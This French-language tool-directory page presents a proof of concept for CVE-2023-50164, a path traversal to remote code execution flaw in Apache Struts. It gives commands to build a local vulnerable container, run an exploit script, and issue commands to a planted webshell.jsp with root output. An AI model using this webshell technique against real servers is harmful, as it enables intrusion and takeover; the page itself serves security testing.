Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-50164-PoC — CVE-2023-50164 (vulnérabilité de traversée de chemin vers exécution de code à distance dans Apache Struts) - Preuve de concept | Kitploit
Outils/GitHubGitHub/sunnyvale-it/cve-2023-50164-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubsunnyvale-it/cve-2023-50164-poc

CVE-2023-50164-PoC

CVE-2023-50164 (vulnérabilité de traversée de chemin vers exécution de code à distance dans Apache Struts) - Preuve de concept

Voir le dépôt
21il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-50164 (Vulnérabilité de traversée de chemin vers exécution de code à distance dans Apache Struts) - Preuve de concept

Cette preuve de concept a été créée pour tester une exécution de code à distance (RCE) en exploitant la vulnérabilité Apache Struts2.

Construisez l'image et exécutez un conteneur :

root@kitploit:~
$ DOCKER_BUILDKIT=1 docker build  . -t struts2-rce-poc && docker run --rm -p 8080:8080 struts2-rce-poc

Exécutez l'exploit :

root@kitploit:~
$ cd exploit
$ ./exploit.sh

Vous pouvez maintenant exécuter des commandes arbitraires côté serveur comme indiqué :

root@kitploit:~
$ curl http://localhost:8080/webshell/webshell.jsp\?cmd\=id%20-a  

uid=0(root) gid=0(root) groups=0(root)

Crédits

  • Merci à @jakabakos pour un exemple d'application vulnérable (https://github.com/jakabakos/CVE-2023-50164-Apache-Struts-RCE)
  • Merci à Zscaler ThreatLabz (https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-50164-apache-struts-path-traversal-and-file) pour le schéma ci-dessus
  • Télécharger l’outil